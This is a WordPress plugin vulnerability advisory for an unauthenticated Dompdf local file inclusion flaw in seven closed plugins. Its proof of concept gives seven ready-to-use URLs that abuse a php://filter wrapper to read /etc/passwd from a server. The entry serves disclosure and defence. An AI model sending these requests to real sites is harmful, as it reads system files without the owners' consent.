WordPress Plugin Vulnerabilities
Multiple plugins - Unauthenticated Dompdf Local File Inclusion (LFI)
Description
Multiple plugins were found to be vulnerable to the Dompdf unauthenticated Local File Inclusion (LFI) vulnerability (CVE-2014-2383).
Proof of Concept
http://www.example.com/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd http://www.example.com/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd http://www.example.com/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd http://www.example.com/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd http://www.example.com/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd http://www.example.com/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd http://www.example.com/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd
Affects Plugins
No known fix - plugin closed
No known fix - plugin closed
No known fix - plugin closed
No known fix - plugin closed
No known fix - plugin closed
No known fix - plugin closed
No known fix - plugin closed
References
Classification
Miscellaneous
Original Researcher
Random Robbie
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2020-03-24 (about 2 years ago)
Added
2020-03-25 (about 2 years ago)
Last Updated
2020-03-26 (about 2 years ago)